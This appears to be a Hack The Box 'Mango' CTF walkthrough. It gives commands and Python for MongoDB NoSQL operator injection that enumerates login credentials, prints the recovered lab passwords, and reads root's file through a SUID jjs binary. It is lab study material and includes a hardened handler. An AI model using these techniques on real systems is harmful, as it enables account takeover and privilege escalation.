
Mango Walkthrough : HackTheBox

User Flag

As with most Hack The Box machines, the name of the box is a strong hint about the attack vector. Here the name Mango suggests that MongoDB will be involved.

A port scan of the machine shows only a few services running:

Ports 22, 80 and 443 are the only ones confirmed open, which means the way in is most likely through the website.

Browsing the site over http returns nothing usable, so we are forced onto https, which serves a Google-style search page with the user MrR3boot already signed in. None of the links disclose anything of interest, and the analytics.php page only references a code.io link.

Opening the page produces a certificate error, as expected on a private lab machine, but inspecting the certificate discloses a possible subdomain of interest:

The certificate was issued for the domain staging-order.mango.htb. Navigating to that name reveals a login page, as follows.

After sending some random usernames and passwords, inspecting the request and response in Burp and testing the URL with sqlmap, nothing stood out as a method of attack (sqlmap targets SQL databases, so a clean result is consistent with a MongoDB backend). At this point I worked on the basis that the backend database was MongoDB, as suggested by the box name. Some searching turned up a NoSQL injection attack that exploits unsanitised input from the login form: where the application expects a plain string, it will also accept MongoDB query operators such as $ne and $regex, which turns the login response into a true/false oracle.

The script is called NoSQL-MongoDB-injection Username and Password Enumeration and can be found at: https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration Download it from a command prompt with:

wget https://raw.githubusercontent.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration/master/nosqli-user-pass-enum.py

From Burp we can see that the input fields are called username and password. Initially we want username enumeration, so we run the script with the following parameters (-up and -pp give the username and password parameter names, -m the HTTP method, -op the extra login:login parameter the form submits, and -ep the field to enumerate):

python2 ./nosqli-user-pass-enum.py -u http://staging-order.mango.htb -up username -pp password -m post -op login:login -ep username

The script enumerates usernames one character at a time and eventually returns two valid users, admin and mango. We then run the same script again, changing the -ep argument from username to password:

python2 ./nosqli-user-pass-enum.py -u http://staging-order.mango.htb -up username -pp password -m post -op login:login -ep password

This returns two passwords: h3mXK8RhU~f{]f5H and t9KcS3>!0B#2.
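To make the mechanism behind the enumeration concrete, the following is an added example (not the an0nlk script and not the box's own code). It assumes a PHP-style form parser that turns username[$regex]=^a into a nested array, a handler that passes that array straight into a MongoDB find(), and models both with an in-memory user store so it runs offline; the two accounts loaded into the store are the ones recovered above. It recovers usernames with $regex against an unconstrained password ($ne), then fixes each username to recover its password, escaping every recovered prefix before it goes back into the regex (the mango password contains { and ], which would otherwise break the query). A hardened handler that rejects non-string input is shown beside the vulnerable one.

```python
import re
import string
from urllib.parse import urlencode

# Constructed stand-in for the MongoDB "users" collection behind the login page.
# The two accounts are the ones the walkthrough recovers; the store itself is an assumption.
USERS = [
    {"username": "admin", "password": "t9KcS3>!0B#2"},
    {"username": "mango", "password": "h3mXK8RhU~f{]f5H"},
]


def _match(stored, cond):
    """Evaluate a tiny subset of MongoDB query semantics for one field."""
    if isinstance(cond, dict):
        if "$regex" in cond:
            return re.search(cond["$regex"], stored) is not None
        if "$ne" in cond:
            return stored != cond["$ne"]
        raise ValueError("unsupported operator %r" % list(cond))
    return stored == cond


def vulnerable_login(form):
    """Models a handler that passes form values straight into find().

    A PHP-style parser turns the POST body  username[$regex]=^a&password[$ne]=
    into {'username': {'$regex': '^a'}, 'password': {'$ne': ''}}, so the client
    controls query operators. Returns True on a successful login (HTTP 200).
    """
    query = {"username": form.get("username"), "password": form.get("password")}
    return any(all(_match(user[k], v) for k, v in query.items()) for user in USERS)


def hardened_login(form):
    """Same check with the fix: only plain strings may reach the query."""
    u, p = form.get("username"), form.get("password")
    if not isinstance(u, str) or not isinstance(p, str):
        return False  # operator objects are rejected before they reach MongoDB
    # Real code would compare a password hash; the type check is the point here.
    return any(user["username"] == u and user["password"] == p for user in USERS)


def to_form_body(query, extra=None):
    """Render a query dict as the bracketed POST body actually sent on the wire."""
    pairs = []
    for field, cond in query.items():
        if isinstance(cond, dict):
            pairs.extend(("%s[%s]" % (field, op), val) for op, val in cond.items())
        else:
            pairs.append((field, cond))
    pairs.extend((extra or {"login": "login"}).items())
    return urlencode(pairs)


def enumerate_field(field, fixed, oracle, charset=string.printable.strip()):
    """Recover every value of `field` for users matching `fixed`, one character at a time.

    `oracle(form) -> bool` is the login endpoint. Each prefix is re.escape()d before
    it goes back into $regex, which matters for values containing metacharacters.
    """
    found = []

    def walk(prefix):
        # Anchored at both ends: is the prefix itself a complete value?
        if oracle(dict(fixed, **{field: {"$regex": "^%s$" % re.escape(prefix)}})):
            found.append(prefix)
        for ch in charset:
            candidate = prefix + ch
            if oracle(dict(fixed, **{field: {"$regex": "^" + re.escape(candidate)}})):
                walk(candidate)

    walk("")
    return sorted(found)


def recover_credentials(oracle=vulnerable_login):
    """Usernames first (password unconstrained via $ne), then each user's own password."""
    usernames = enumerate_field("username", {"password": {"$ne": ""}}, oracle)
    creds = {}
    for u in usernames:
        passwords = enumerate_field("password", {"username": u}, oracle)
        creds[u] = passwords[0] if passwords else None
    return creds


if __name__ == "__main__":
    print(to_form_body({"username": {"$regex": "^a"}, "password": {"$ne": ""}}))
    print(recover_credentials())
```

Fixing the username while enumerating the password is what ties each password to its account, which the single-field run above does not do. Against the hardened handler the same enumeration returns nothing, because every operator-bearing request fails the type check before a query is built.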

We then log on to the box over ssh as mango with the password h3mXK8RhU~f{]f5H. Once logged in we can see that /home/mango is empty and that user.txt is located in /home/admin. Attempting to cat user.txt gives permission denied.

We su to admin and supply the second password found by the MongoDB enumeration script, as shown below:

We can then read user.txt and submit the user flag.

Root Flag

We start with standard enumeration of the server from the existing shell. We cannot read /etc/sudoers, and as admin we are not able to use sudo to list any default sudo entries.

Listing the SUID executables on the server returns a lot of entries. The SUID (set user ID) bit is a feature of Unix-like systems that makes a program run with the effective user ID of the file's owner rather than that of the user who launched it, so a program a standard user runs may execute as root. That is what makes this list interesting.

Going through the list, we find /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs. jjs is the command-line shell for the Nashorn JavaScript engine that ships with the JDK: it runs JavaScript rather than Java, but scripts can call any Java class, which is what makes a SUID root copy of it dangerous.

I searched multiple websites for a way to get a reverse shell from a jjs prompt and, while several made this easy from a Windows host, nothing indicated it could be done easily from Linux. I then searched for how to read a file from the file system and found a jjs one-liner (which calls Java's file API from within the jjs shell) on the apimeister website: https://apimeister.com/2015/06/12/read-the-content-of-a-file-in-one-line-in-jjs.html

I adapted that one-liner to point at /root/root.txt and entered it at the jjs shell. It executed without any errors.

Once the script has run, entering print(content) outputs the content variable to the screen, and it contains the root flag.

Steve.
